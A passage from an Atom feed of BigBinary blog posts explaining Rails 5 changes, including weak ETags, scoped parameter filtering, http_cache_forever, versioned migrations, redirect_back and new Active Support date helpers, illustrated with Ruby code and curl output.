Server: WEBrick/1.3.1 (Ruby/2.2.2/2015-04-13)
Date: Fri, 04 Mar 2016 10:51:22 GMT
Connection: Keep-Alive</code></pre><h2>Rails 5 sets weak ETags by default</h2><p>In Rails 5, all ETags generated by Rails are <a href="https://github.com/rails/rails/pull/17573">weak by default</a>.</p><pre><code class="language-plaintext">$ curl -i http://localhost:3000/items/1
HTTP/1.1 200 OK
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Etag: W/&quot;b749c4dd1b20885128f9d9a1a8ba70b6&quot;
Last-Modified: Sat, 05 Mar 2016 00:00:00 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=0, private, must-revalidate
X-Request-Id: a24b986c-74f0-4e23-9b1d-0b52cb3ef906
X-Runtime: 0.038372
Server: WEBrick/1.3.1 (Ruby/2.2.3/2015-08-18)
Date: Fri, 04 Mar 2016 10:48:35 GMT
Content-Length: 1906
Connection: Keep-Alive</code></pre><p>For the second request, the server returns a <code>304 Not Modified</code> response as before, but the ETag is a weak ETag.</p><pre><code class="language-plaintext">$ curl -i -H 'If-None-Match: W/&quot;b749c4dd1b20885128f9d9a1a8ba70b6&quot;' http://localhost:3000/items/1
HTTP/1.1 304 Not Modified
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Etag: W/&quot;b749c4dd1b20885128f9d9a1a8ba70b6&quot;
Last-Modified: Sat, 05 Mar 2016 00:00:00 GMT
Cache-Control: max-age=0, private, must-revalidate
X-Request-Id: 7fc8a8b9-c7ff-4600-bf9b-c847201973cc
X-Runtime: 0.005469
Server: WEBrick/1.3.1 (Ruby/2.2.3/2015-08-18)
Date: Fri, 04 Mar 2016 10:49:27 GMT
Connection: Keep-Alive</code></pre><h2>Why this change?</h2><p>Rails does not perform the strong validation implied by the strong ETag spec. Rails just checks whether the incoming ETag from the request headers matches the ETag of the generated response. It does not do a byte-by-byte comparison of the response.</p><p>This was true even before Rails 5, so this change is more of a course correction. Rack also <a href="https://github.com/rack/rack/issues/681">generates weak ETags</a> by default for similar reasons.</p><p><a href="https://twitter.com/mnot">Mark Nottingham</a> is chair of the <a href="http://httpwg.org">HTTP Working Group</a> and he <a href="https://www.mnot.net/blog/2007/08/07/etags">has written about ETags</a>, with some useful links to other ETag resources.</p><h3>How to use strong ETags in Rails 5</h3><p>If we want to bypass the default Rails 5 behavior and use strong ETags, we can do so in the following way.</p><pre><code class="language-ruby">class ItemsController &lt; ApplicationController
  def show
    @item = Item.find(params[:id])
    fresh_when strong_etag: @item
  end
end</code></pre><p>This will generate a strong ETag, i.e. without the <code>W/</code> prefix.</p>]]></content>
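The two header formats shown in this entry are easy to produce by hand: an ETag is just a quoted digest, and a weak ETag is the same string with a `W/` prefix. This is a simplified sketch; Rails feeds more than the raw body into its digest:

```ruby
require "digest"

# Simplified sketch of the two ETag formats: a quoted digest for the strong
# ETag and a W/ prefix for the weak variant. (Rails digests more than the raw
# body; the shape of the header value is what matters here.)
body        = "<h1>Welcome</h1>"
strong_etag = %("#{Digest::MD5.hexdigest(body)}")
weak_etag   = "W/#{strong_etag}"
```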
    </entry><entry>
       <title><![CDATA[Parameter filtering enhancement in Rails 5]]></title>
       <author><name>Vijay Kumar Agrawal</name></author>
      <link href="https://www.bigbinary.com/blog/parameter-filtering-enhacement-rails-5"/>
      <updated>2016-03-07T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/parameter-filtering-enhacement-rails-5</id>
       <content type="html"><![CDATA[<p>For security reasons, we do not want sensitive data like passwords, credit card information, auth keys etc. to appear in log files.</p><p>Rails makes it very easy to filter such data. Just add the following line in <code>application.rb</code> to filter sensitive information.</p><pre><code class="language-ruby">config.filter_parameters += [:password]</code></pre><p>Now the log file will show <code>[FILTERED]</code> instead of the real password value.</p><p>This replacement of <code>password</code> with <code>[FILTERED]</code> is done recursively.</p><pre><code class="language-ruby">{user_name: &quot;john&quot;, password: &quot;123&quot;}
{user: {name: &quot;john&quot;, password: &quot;123&quot;}}
{user: {auth: {id: &quot;john&quot;, password: &quot;123&quot;}}}</code></pre><p>In all of the above cases, &quot;123&quot; would be replaced by &quot;[FILTERED]&quot;.</p><p>Now think of a situation where we do not want to filter every occurrence of a key. Here is an example.</p><pre><code class="language-ruby">{credit_card: {number: &quot;123456789&quot;, code: &quot;999&quot;}}
{user_preference: {color: {name: &quot;Grey&quot;, code: &quot;999999&quot;}}}</code></pre><p>We definitely want to filter <code>[:credit_card][:code]</code>, but we want <code>[:color][:code]</code> to show up in the log file.</p><p>This <a href="https://github.com/rails/rails/pull/13897">can be achieved in Rails 5</a>.</p><p>The <code>application.rb</code> configuration changes from</p><pre><code class="language-ruby">config.filter_parameters += [&quot;code&quot;]</code></pre><p>to</p><pre><code class="language-ruby">config.filter_parameters += [&quot;credit_card.code&quot;]</code></pre><p>Now, so long as the parent of <code>code</code> is <code>credit_card</code>, Rails will filter the data.</p>]]></content>
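The "filter only under this parent" idea can be sketched as a small recursive function. This is illustrative plain Ruby; `filter_params` is invented here and is not the Rails implementation:

```ruby
# Sketch of parent-aware filtering in the spirit of "credit_card.code"
# (illustrative plain Ruby; filter_params is invented here, not Rails code):
# a value is masked only when both its key and its parent key match.
def filter_params(params, parent_key, child_key, parent: nil)
  params.each_with_object({}) do |(key, value), result|
    result[key] =
      if value.is_a?(Hash)
        filter_params(value, parent_key, child_key, parent: key)
      elsif key == child_key && parent == parent_key
        "[FILTERED]"
      else
        value
      end
  end
end

params = {
  credit_card: { number: "123456789", code: "999" },
  user_preference: { color: { name: "Grey", code: "999999" } }
}
filtered = filter_params(params, :credit_card, :code)
# credit_card's code is masked; color's code is left alone
```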
    </entry><entry>
       <title><![CDATA[Rails 5 adds http_cache_forever]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-http-cache-forever"/>
      <updated>2016-03-04T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-http-cache-forever</id>
      <content type="html"><![CDATA[<p>Rails 5 allows us to <a href="https://github.com/rails/rails/pull/18394">cache HTTP responses forever</a> by introducing the <code>http_cache_forever</code> method.</p><p>Sometimes we have static pages that never or rarely change.</p><pre><code class="language-ruby"># app/controllers/home_controller.rb
class HomeController &lt; ApplicationController
  def index
    render
  end
end

# app/views/home/index.html.erb
&lt;h1&gt;Welcome&lt;/h1&gt;</code></pre><p>Let's see the log for the above action.</p><pre><code class="language-plaintext">Processing by HomeController#index as HTML
  Rendered home/index.html.erb within layouts/application (1.3ms)
Completed 200 OK in 224ms (Views: 212.4ms | ActiveRecord: 0.0ms)</code></pre><p>And so on for every request to this action. The response does not change, and still we are rendering the same thing again and again and again.</p><h2>Rails 5 introduces http_cache_forever</h2><p>When a response does not change, we want browsers and proxies to cache it for a long time.</p><p>The <code>http_cache_forever</code> method allows us to set response headers to tell browsers and proxies that the response has not been modified.</p><pre><code class="language-ruby"># app/controllers/home_controller.rb
class HomeController &lt; ApplicationController
  def index
    http_cache_forever(public: true) {}
  end
end

# OR

class HomeController &lt; ApplicationController
  def index
    http_cache_forever(public: true) do
      render
    end
  end
end

# app/views/home/index.html.erb
&lt;h1&gt;Welcome&lt;/h1&gt;</code></pre><p>Now let's look at the log for the modified code.</p><pre><code class="language-plaintext"># When the request is made for the first time.
Processing by HomeController#index as HTML
  Rendered home/index.html.erb within layouts/application (1.3ms)
Completed 200 OK in 224ms (Views: 212.4ms | ActiveRecord: 0.0ms)

# For consecutive requests for the same page.
Processing by HomeController#index as HTML
Completed 304 Not Modified in 2ms (ActiveRecord: 0.0ms)</code></pre><p>On the first hit, we serve the request normally, but on each subsequent request the cache is revalidated and a &quot;304 Not Modified&quot; response is sent to the browser.</p><h2>Options with http_cache_forever</h2><p>By default, HTTP responses are cached only in the user's web browser. To allow proxies to cache the response as well, we can set <code>public: true</code> to indicate that they can serve the cached response.</p><h2>Use http_cache_forever with caution</h2><p>With this method, <code>Cache-Control: max-age=3155760000</code> is set as a response header, and the browser/proxy won't revalidate the resource with the server unless a force reload is done.</p><p>When a force reload is done, <code>Cache-Control: max-age=0</code> is set as a request header. In that case, the browser will receive the changed resource whether the ETag has changed or not.</p><p><code>http_cache_forever</code> literally sets the headers to cache the response for 100 years, and developers would have to take extra steps to revalidate it. So it should be used with extra care.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Better exception responses in Rails 5 API apps]]></title>
       <author><name>Akshay Mohite</name></author>
      <link href="https://www.bigbinary.com/blog/better-exception-responses-in-rails-5-api-apps"/>
      <updated>2016-03-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/better-exception-responses-in-rails-5-api-apps</id>
      <content type="html"><![CDATA[<p>Rails 4.x returns error information as an HTML page whenever there is an exception in the development environment.</p><p>This is fine for normal HTML requests. But traditionally, Rails always returned an HTML response for exceptions for all requests, including JSON or XML requests, in development.</p><p>We can now generate API only apps in Rails 5. For such apps, it's better to have the error message in the format in which the request was made. An HTML response for a JSON endpoint like <code>http://localhost:3000/posts.json</code> is not going to help in debugging why the exception happened.</p><h2>New config option debug_exception_response_format</h2><p>Rails 5 has introduced a <a href="https://github.com/rails/rails/pull/20831">new configuration</a> to respond with the proper format for exceptions.</p><pre><code class="language-ruby"># config/environments/development.rb
config.debug_exception_response_format = :api</code></pre><p>Let's see an example of the response received with this configuration.</p><pre><code class="language-bash">$ curl localhost:3000/posts.json

{&quot;status&quot;:404,&quot;error&quot;:&quot;Not Found&quot;,&quot;exception&quot;:&quot;#\u003cActionController::RoutingError: No route matches [GET] \&quot;/posts.json\&quot;\u003e&quot;,&quot;traces&quot;:{&quot;Application Trace&quot;:[...],&quot;Framework Trace&quot;:[...]}}</code></pre><p>The <code>status</code> key represents the HTTP status code and the <code>error</code> key represents the corresponding Rack HTTP status.</p><p><code>exception</code> prints the actual exception in <code>inspect</code> format.</p><p><code>traces</code> contains application and framework traces, similar to how they are displayed on the HTML error page.</p><p>In API only apps, <code>config.debug_exception_response_format</code> is set to <code>:api</code> by default, so error responses are rendered in the same format as the request.</p><p>If you want the original behavior of rendering HTML pages, you can configure this option as follows.</p><pre><code class="language-ruby"># config/environments/development.rb
config.debug_exception_response_format = :default</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Use file_fixture to access test files in Rails 5]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/use-file_fixture-to-access-test-files-rails-5"/>
      <updated>2016-03-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/use-file_fixture-to-access-test-files-rails-5</id>
      <content type="html"><![CDATA[<p>While writing tests, we sometimes need to read files to compare the output. For example, a test might want to compare the API response with pre-determined data stored in a file.</p><p>Here is an example.</p><pre><code class="language-ruby"># In test helper
def file_data(name)
  File.read(Rails.root.to_s + &quot;/tests/support/files/#{name}&quot;)
end

# In test
class PostsControllerTest &lt; ActionDispatch::IntegrationTest
  setup do
    @post = posts(:one)
  end

  test &quot;should get index&quot; do
    get posts_url, format: :json
    assert_equal file_data('posts.json'), response.body
  end
end</code></pre><h2>File Fixtures in Rails 5</h2><p>In Rails 5, we can now organize such test files as fixtures.</p><p>Newly generated Rails 5 applications have the directory <code>test/fixtures/files</code> to store such test files.</p><p>These test files can be accessed using the <code>file_fixture</code> helper method in tests.</p><pre><code class="language-ruby">require 'test_helper'

class PostsControllerTest &lt; ActionDispatch::IntegrationTest
  setup do
    @post = posts(:one)
  end

  test &quot;should get index&quot; do
    get posts_url, format: :json
    assert_equal response.body, file_fixture('posts.json').read
  end
end</code></pre><p>The <code>file_fixture</code> method returns a <code>Pathname</code> object, so it's easy to extract file-specific information.</p><pre><code class="language-ruby">file_fixture('posts.json').read
file_fixture('song.mp3').size</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Migrations are versioned in Rails 5]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/migrations-are-versioned-in-rails-5"/>
      <updated>2016-03-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/migrations-are-versioned-in-rails-5</id>
      <content type="html"><![CDATA[<p>We will see how migrations in Rails 5 differ by looking at a few cases.</p><h2>Case I</h2><p>In Rails 4.x, the command</p><pre><code class="language-ruby">rails g model User name:string</code></pre><p>will generate the migration shown below.</p><pre><code class="language-ruby">class CreateUsers &lt; ActiveRecord::Migration
  def change
    create_table :users do |t|
      t.string :name

      t.timestamps null: false
    end
  end
end</code></pre><p>In Rails 5, the same command will generate the following migration.</p><pre><code class="language-ruby">class CreateUsers &lt; ActiveRecord::Migration[5.0]
  def change
    create_table :users do |t|
      t.string :name

      t.timestamps
    end
  end
end</code></pre><p>Let's see the generated schema after running the migration generated in Rails 5.</p><pre><code class="language-sql">sqlite&gt; .schema users
CREATE TABLE &quot;users&quot; (&quot;id&quot; INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, &quot;name&quot; varchar, &quot;created_at&quot; datetime NOT NULL, &quot;updated_at&quot; datetime NOT NULL);
sqlite&gt;</code></pre><p>Rails 5 added <code>NOT NULL</code> constraints on the timestamp columns even though the not null constraint was not specified in the migration.</p><h2>Case II</h2><p>Let's look at another example.</p><p>In Rails 4.x, the command</p><pre><code class="language-ruby">rails g model Task user:references</code></pre><p>would generate the following migration.</p><pre><code class="language-ruby">class CreateTasks &lt; ActiveRecord::Migration
  def change
    create_table :tasks do |t|
      t.references :user, index: true, foreign_key: true

      t.timestamps null: false
    end
  end
end</code></pre><p>In Rails 5, the same command will generate the following migration.</p><pre><code class="language-ruby">class CreateTasks &lt; ActiveRecord::Migration[5.0]
  def change
    create_table :tasks do |t|
      t.references :user, foreign_key: true

      t.timestamps
    end
  end
end</code></pre><p>There is no mention of <code>index: true</code> in the above migration. Let's see the generated schema after running the Rails 5 migration.</p><pre><code class="language-sql">sqlite&gt; .schema tasks
CREATE TABLE &quot;tasks&quot; (&quot;id&quot; INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, &quot;user_id&quot; integer, &quot;created_at&quot; datetime NOT NULL, &quot;updated_at&quot; datetime NOT NULL);
CREATE INDEX &quot;index_tasks_on_user_id&quot; ON &quot;tasks&quot; (&quot;user_id&quot;);</code></pre><p>As you can see, an index on the <code>user_id</code> column is added even though it's not present in the migration.</p><h2>Migration API has changed in Rails 5</h2><p>Rails 5 has changed the migration API: even though the <code>null: false</code> option is not passed to <code>timestamps</code>, when migrations are run <code>NOT NULL</code> is <a href="https://github.com/rails/rails/commit/a939506f297b667291480f26fa32a373a18ae06a">automatically added</a> for the timestamp columns.</p><p>Similarly, we want indexes on referenced columns in almost all cases, so Rails 5 does not need references to have <code>index: true</code>. When migrations are run, the index is <a href="https://github.com/rails/rails/pull/23179">automatically created</a>.</p><p>Now let's assume that an app was created in Rails 4.x and has a bunch of migrations, and that the app was later upgraded to Rails 5. When those older migrations are run, they will behave differently and will create a different schema file.
This is a problem.</p><p>The solution is versioned migrations.</p><h3>Versioned migrations in Rails 5</h3><p>Let's look closely at the migration generated in Rails 5.</p><pre><code class="language-ruby">class CreateTasks &lt; ActiveRecord::Migration[5.0]
  def change
    create_table :tasks do |t|
      t.references :user, foreign_key: true

      t.timestamps
    end
  end
end</code></pre><p>The <code>CreateTasks</code> class now inherits from <code>ActiveRecord::Migration[5.0]</code> instead of <code>ActiveRecord::Migration</code>.</p><p>Here <code>[5.0]</code> is the Rails version that generated this migration.</p><h2>Solving the issue with older migrations</h2><p>Whenever Rails 5 runs migrations, it checks the class of the migration file being run. If it is <code>ActiveRecord::Migration[5.0]</code>, it uses the new migration API, which has changes like automatically adding <code>null: false</code> to timestamps.</p><p>But whenever the class of the migration file is other than <code>ActiveRecord::Migration[5.0]</code>, Rails will use a compatibility layer of the migrations API. Currently this <a href="https://github.com/rails/rails/blob/434c8dc96759d4eca36ca05865b6321c54a2a90b/activerecord/lib/active_record/migration/compatibility.rb#L6-L93">compatibility layer</a> is present for Rails 4.2. This means that all migrations generated prior to Rails 5 will be treated as if they were generated in Rails 4.2.</p><p>You will also see a <a href="https://github.com/rails/rails/blob/434c8dc96759d4eca36ca05865b6321c54a2a90b/activerecord/lib/active_record/migration/compatibility.rb#L105-L112">deprecation warning</a> asking you to add the version of the migration to the class name for older migrations.</p><p>So if you are migrating a Rails 4.2 app, all of your migrations will have the class <code>ActiveRecord::Migration</code>. If you run those migrations in Rails 5, you will see a warning asking you to add the version to the class name so that it looks like <code>ActiveRecord::Migration[4.2]</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 improves redirect_to :back method]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-improves-redirect_to_back-with-redirect-back"/>
      <updated>2016-02-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-improves-redirect_to_back-with-redirect-back</id>
      <content type="html"><![CDATA[<p>In Rails 4.x, to go back to the previous page we use <code>redirect_to :back</code>.</p><p>However, we sometimes get an <code>ActionController::RedirectBackError</code> exception when <code>HTTP_REFERER</code> is not present.</p><pre><code class="language-ruby">class PostsController &lt; ApplicationController
  def publish
    post = Post.find params[:id]
    post.publish!

    redirect_to :back
  end
end</code></pre><p>This works well when <code>HTTP_REFERER</code> is present, and it redirects to the previous page.</p><p>The issue comes up when <code>HTTP_REFERER</code> is not present, which results in an exception.</p><p>To avoid this exception we can rescue it and redirect to the root URL.</p><pre><code class="language-ruby">class PostsController &lt; ApplicationController
  rescue_from ActionController::RedirectBackError, with: :redirect_to_default

  def publish
    post = Post.find params[:id]
    post.publish!

    redirect_to :back
  end

  private

  def redirect_to_default
    redirect_to root_path
  end
end</code></pre><h2>Improvement in Rails 5</h2><p>In Rails 5, <code>redirect_to :back</code> has been deprecated and instead <a href="https://github.com/rails/rails/pull/22506">a new method has been added</a> called <code>redirect_back</code>.</p><p>To deal with the situation when <code>HTTP_REFERER</code> is not present, it takes a required option <code>fallback_location</code>.</p><pre><code class="language-ruby">class PostsController &lt; ApplicationController
  def publish
    post = Post.find params[:id]
    post.publish!

    redirect_back(fallback_location: root_path)
  end
end</code></pre><p>This redirects to <code>HTTP_REFERER</code> when it is present; when it is not, it redirects to whatever is passed as <code>fallback_location</code>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 allows configuring queue name for mailers]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-allows-configuring-queue-name-for-mailers"/>
      <updated>2016-02-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-allows-configuring-queue-name-for-mailers</id>
      <content type="html"><![CDATA[<p>In Rails 4.2, Active Job was integrated with Action Mailer to send emails asynchronously.</p><p>Rails provides the <code>deliver_later</code> method to enqueue mailer jobs.</p><pre><code class="language-ruby">class UserMailer &lt; ApplicationMailer
  def send_notification(user)
    @user = user
    mail(to: user.email)
  end
end

&gt; UserMailer.send_notification(user).deliver_later
=&gt; &lt;ActionMailer::DeliveryJob:0x007ff602dd3128 @arguments=[&quot;UserMailer&quot;, &quot;send_notification&quot;, &quot;deliver_now&quot;, &lt;User id: 1, name: &quot;John&quot;, email: &quot;john@bigbinary.com&quot;&gt;], @job_id=&quot;d0171da0-86d3-49f4-ba03-37b37d4e8e2b&quot;, @queue_name=&quot;mailers&quot;, @priority=nil&gt;</code></pre><p>Note that the task of delivering the email was put in a queue called <code>mailers</code>.</p><p>In Rails 4.x, all background jobs go to a queue named &quot;default&quot; except mailer jobs. All outgoing mails go to a queue named &quot;mailers&quot;, and we do not have the option of changing this queue name to anything else.</p><p>Since Rails 4.x thus requires a minimum of two queues, it is difficult to use queuing services like <a href="https://github.com/chanks/que">que</a> that rely on the application having only one queue.</p><h2>Customizing queue name in Rails 5</h2><p>In Rails 5, we can now <a href="https://github.com/rails/rails/pull/18587">change the queue name</a> for mailer jobs using the following configuration.</p><pre><code class="language-ruby">config.action_mailer.deliver_later_queue_name = 'default'

class UserMailer &lt; ApplicationMailer
  def send_notification(user)
    @user = user
    mail(to: user.email)
  end
end

2.2.2 :003 &gt; user = User.last
=&gt; &lt;User id: 6, name: &quot;John&quot;, email: &quot;john@bigbinary.com&quot;&gt;
2.2.2 :004 &gt; UserMailer.send_notification(user).deliver_later
=&gt; &lt;ActionMailer::DeliveryJob:0x007fea2182b2d0 @arguments=[&quot;UserMailer&quot;, &quot;send_notification&quot;, &quot;deliver_now&quot;, &lt;User id: 1, name: &quot;John&quot;, email: &quot;john@bigbinary.com&quot;&gt;], @job_id=&quot;316b00b2-64c8-4a2d-8153-4ce7abafb28d&quot;, @queue_name=&quot;default&quot;, @priority=nil&gt;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 handles DateTime with better precision]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-handles-datetime-with-better-precision"/>
      <updated>2016-02-23T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-handles-datetime-with-better-precision</id>
      <content type="html"><![CDATA[<p>MySQL 5.6.4 and up <a href="https://dev.mysql.com/doc/refman/5.6/en/fractional-seconds.html">has added fractional seconds support</a> for TIME, DATETIME, and TIMESTAMP values, with up to microsecond (6 digit) precision.</p><h2>Adding precision to migration</h2><p>To add precision to a <code>datetime</code> column, we need to add the <code>limit</code> option to it. By default it is set to 0.</p><pre><code class="language-ruby">def change
  add_column :users, :last_seen_at, :datetime, limit: 6
end</code></pre><p>This adds precision 6 to the <code>last_seen_at</code> column in the <code>users</code> table.</p><h2>Rails 4.x behavior</h2><p>Let's look at some examples with different precision values.</p><p>The task here is to set the <code>end_of_day</code> value on the <code>updated_at</code> column.</p><h3>With precision set to 6</h3><pre><code class="language-ruby">user = User.first

user.updated_at
=&gt; Mon, 18 Jan 2016 10:13:10 UTC +00:00

user.updated_at = user.updated_at.end_of_day
=&gt; Mon, 18 Jan 2016 23:59:59 UTC +00:00

user.save
'UPDATE `users` SET `updated_at` = '2016-01-18 23:59:59.999999' WHERE `users`.`id` = 1'

user.updated_at
=&gt; Mon, 18 Jan 2016 23:59:59 UTC +00:00

user.reload
user.updated_at
=&gt; Mon, 18 Jan 2016 23:59:59 UTC +00:00</code></pre><p>Everything looks good here.</p><p>But let's look at what happens when precision is set to 0.</p><h3>With precision set to 0</h3><pre><code class="language-ruby">user = User.first

user.updated_at
=&gt; Mon, 18 Jan 2016 10:13:10 UTC +00:00

user.updated_at = user.updated_at.end_of_day
=&gt; Mon, 18 Jan 2016 23:59:59 UTC +00:00

user.save
'UPDATE `users` SET `updated_at` = '2016-01-18 23:59:59.999999' WHERE `users`.`id` = 1'

user.updated_at
=&gt; Mon, 18 Jan 2016 23:59:59 UTC +00:00</code></pre><p>So far everything looks good here too.
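</p><p>The hazard hiding in that last UPDATE can be sketched in plain Ruby. This is a hypothetical stand-in for Active Support's <code>end_of_day</code> and the database's rounding, not the Rails or MySQL implementation:</p>

```ruby
# Stand-in for end_of_day: the last representable microsecond of the day.
eod = Time.utc(2016, 1, 18, 23, 59, 59, 999_999)
puts eod.strftime("%Y-%m-%d %H:%M:%S.%6N")   # 2016-01-18 23:59:59.999999

# A column with precision 0 rounds to whole seconds, which pushes the
# value across the date boundary.
rounded = Time.at(eod.to_f.round).utc
puts rounded.strftime("%Y-%m-%d %H:%M:%S")   # 2016-01-19 00:00:00
```

<p>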
Now let's see what happens when we reload this object.</p><pre><code class="language-ruby">user.reload
user.updated_at
=&gt; Tue, 19 Jan 2016 00:00:00 UTC +00:00</code></pre><p>As we can clearly see, after the reload the <code>updated_at</code> value has been rounded off from <code>2016-01-18 23:59:59.999999</code> to <code>2016-01-19 00:00:00</code>. It might seem like a small issue, but notice that the date has changed from <code>01/18</code> to <code>01/19</code> because of this rounding.</p><h2>Improvement in Rails 5</h2><p>The Rails team fixed this issue by removing the fractional part when the MySQL column does not support precision.</p><p>Here are the two relevant commits for this change.</p><ul><li><p><a href="https://github.com/rails/rails/commit/e975d7cd1a6cb177f914024ffec8dd9a6cdc4ba1">Commit for support of precision with MySQL</a></p></li><li><p><a href="https://github.com/rails/rails/commit/f1a0fa9e">Commit for checking precision on columns</a></p></li></ul><h3>With precision set to 0</h3><pre><code class="language-ruby">user.updated_at
=&gt; Tue, 19 Jan 2016 00:00:00 UTC +00:00

user.updated_at = user.updated_at.tomorrow.beginning_of_day - 1
=&gt; Tue, 19 Jan 2016 23:59:59 UTC +00:00

user.save
'UPDATE `users` SET `updated_at` = '2016-01-19 23:59:59' WHERE `users`.`id` = 1'

user.reload
user.updated_at
=&gt; Tue, 19 Jan 2016 23:59:59 UTC +00:00</code></pre><p>If precision is not set, the fractional part gets stripped and the date does not change.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Active Support Improvements in Rails 5]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/active-support-improvements-in-Rails-5"/>
      <updated>2016-02-17T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/active-support-improvements-in-Rails-5</id>
      <content type="html"><![CDATA[<p>Rails 5 has added some nice enhancements to Active Support. This blog will go over some of those changes.</p><h2>Improvements in Date, Time and DateTime</h2><h3>prev_day and next_day</h3><p>As the name suggests, <code>next_day</code> <a href="https://github.com/rails/rails/pull/18335">returns the next calendar date</a>.</p><p>Similarly, <code>prev_day</code> returns the previous calendar date.</p><pre><code class="language-ruby">Time.current
=&gt; Fri, 12 Feb 2016 08:53:31 UTC +00:00

Time.current.next_day
=&gt; Sat, 13 Feb 2016 08:53:31 UTC +00:00

Time.current.prev_day
=&gt; Thu, 11 Feb 2016 08:53:31 UTC +00:00</code></pre><h3>Support for same_time option to next_week and prev_week</h3><p>In Rails 4.x, <code>next_week</code> returns the beginning of next week and <code>prev_week</code> returns the beginning of the previous week.</p><p>In Rails 4.x these two methods also accept a week day as a parameter.</p><pre><code class="language-ruby">Time.current
=&gt; Fri, 12 Feb 2016 08:53:31 UTC +00:00

Time.current.next_week
=&gt; Mon, 15 Feb 2016 00:00:00 UTC +00:00

Time.current.next_week(:tuesday)
=&gt; Tue, 16 Feb 2016 00:00:00 UTC +00:00

Time.current.prev_week(:tuesday)
=&gt; Tue, 02 Feb 2016 00:00:00 UTC +00:00</code></pre><p>By using a week day as a parameter we can get the date one week from now, but the returned value is still the beginning of that date.
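</p><p>The difference between the two behaviours can be sketched in plain Ruby with <code>DateTime</code>. This is a hypothetical illustration, not Active Support's implementation:</p>

```ruby
require "date"

now = DateTime.new(2016, 2, 12, 8, 53, 31)  # a Friday

# Beginning of next week: jump to the coming Monday and drop the time.
days_until_monday = (8 - now.wday) % 7
days_until_monday = 7 if days_until_monday.zero?
beginning_of_next_week = (now + days_until_monday).to_date.to_datetime

# The same_time behaviour keeps the time-of-day on that Monday.
time_of_day = now - now.to_date.to_datetime  # fraction of a day
same_time_next_week = beginning_of_next_week + time_of_day

puts beginning_of_next_week   # 2016-02-15T00:00:00+00:00
puts same_time_next_week      # 2016-02-15T08:53:31+00:00
```

<p>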
How do we get one week from the current time?</p><p>Rails 5 adds an additional option <code>same_time: true</code> to solve this problem.</p><p>Using this option, we can now get next week's date at the current time.</p><pre><code class="language-ruby">Time.current
=&gt; Fri, 12 Feb 2016 09:15:10 UTC +00:00

Time.current.next_week
=&gt; Mon, 15 Feb 2016 00:00:00 UTC +00:00

Time.current.next_week(same_time: true)
=&gt; Mon, 15 Feb 2016 09:15:20 UTC +00:00

Time.current.prev_week
=&gt; Mon, 01 Feb 2016 00:00:00 UTC +00:00

Time.current.prev_week(same_time: true)
=&gt; Mon, 01 Feb 2016 09:16:50 UTC +00:00</code></pre><h3>on_weekend?</h3><p>This method returns <code>true</code> if the receiving date/time is a Saturday or Sunday.</p><pre><code class="language-ruby">Time.current
=&gt; Fri, 12 Feb 2016 09:47:40 UTC +00:00

Time.current.on_weekend?
=&gt; false

Time.current.tomorrow
=&gt; Sat, 13 Feb 2016 09:48:47 UTC +00:00

Time.current.tomorrow.on_weekend?
=&gt; true</code></pre><h3>on_weekday?</h3><p>This method returns <code>true</code> if the receiving date/time is not a Saturday or Sunday.</p><pre><code class="language-ruby">Time.current
=&gt; Fri, 12 Feb 2016 09:47:40 UTC +00:00

Time.current.on_weekday?
=&gt; true

Time.current.tomorrow
=&gt; Sat, 13 Feb 2016 09:48:47 UTC +00:00

Time.current.tomorrow.on_weekday?
=&gt; false</code></pre><h3>next_weekday and prev_weekday</h3><p><code>next_weekday</code> returns the next day that is not a weekend.</p><p>Similarly, <code>prev_weekday</code> returns the last day that is not a weekend.</p><pre><code class="language-ruby">Time.current
=&gt; Fri, 12 Feb 2016 09:47:40 UTC +00:00

Time.current.next_weekday
=&gt; Mon, 15 Feb 2016 09:55:14 UTC +00:00

Time.current.prev_weekday
=&gt; Thu, 11 Feb 2016 09:55:33 UTC +00:00</code></pre><h3>Time.days_in_year</h3><pre><code class="language-ruby"># Gives the number of days in the current year, if year is not passed.
Time.days_in_year
=&gt; 366

# Gives the number of days in the specified year, if year is passed.
Time.days_in_year(2015)
=&gt; 365</code></pre><h2>Improvements in Enumerable</h2><h3>pluck</h3><p>The <code>pluck</code> method is now <a href="https://github.com/rails/rails/pull/20350">added to</a> Enumerable objects.</p><pre><code class="language-ruby">users = [{id: 1, name: 'Max'}, {id: 2, name: 'Mark'}, {id: 3, name: 'George'}]

users.pluck(:name)
=&gt; [&quot;Max&quot;, &quot;Mark&quot;, &quot;George&quot;]

# Takes multiple arguments as well
users.pluck(:id, :name)
